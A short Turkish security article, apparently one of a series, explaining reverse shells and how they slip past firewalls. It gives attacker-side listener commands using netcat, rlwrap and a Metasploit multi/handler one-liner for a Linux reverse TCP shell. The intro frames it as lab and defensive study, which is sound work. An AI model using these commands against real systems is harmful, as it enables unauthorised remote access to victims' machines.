Araştırma 03/08
Reverse Shell: Bağlantı Almanın Yolları
Ters bağlantı kanallarının ağ ve süreç telemetrisinde bıraktığı izleri, yetkili laboratuvar örnekleri ve savunma kontrolleriyle inceleyen teknik kayıt.
Bu yazıda
Reverse Shell Nedir?
Normal bir shell bağlantısında saldırgan hedef sisteme bağlanır (bind shell). Reverse shell'de ise hedef sistem saldırgana bağlanır. Bu yaklaşım, güvenlik duvarı kurallarını atlatmak için kritik önem taşır — çünkü çoğu firewall gelen bağlantıları filtreler, giden bağlantıları serbest bırakır.
[Hedef] ──── bağlantı kurma ────▶ [Saldırgan:4444]
Listener Başlatma
Payload çalıştırmadan önce kendi makinenizde dinleyiciyi açın:
# Netcat ile klasik listenernc -lvnp 4444# Rlwrap ile geliştirme (ok tuşları, history)rlwrap nc -lvnp 4444# Metasploit multi/handlermsfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/shell_reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; run"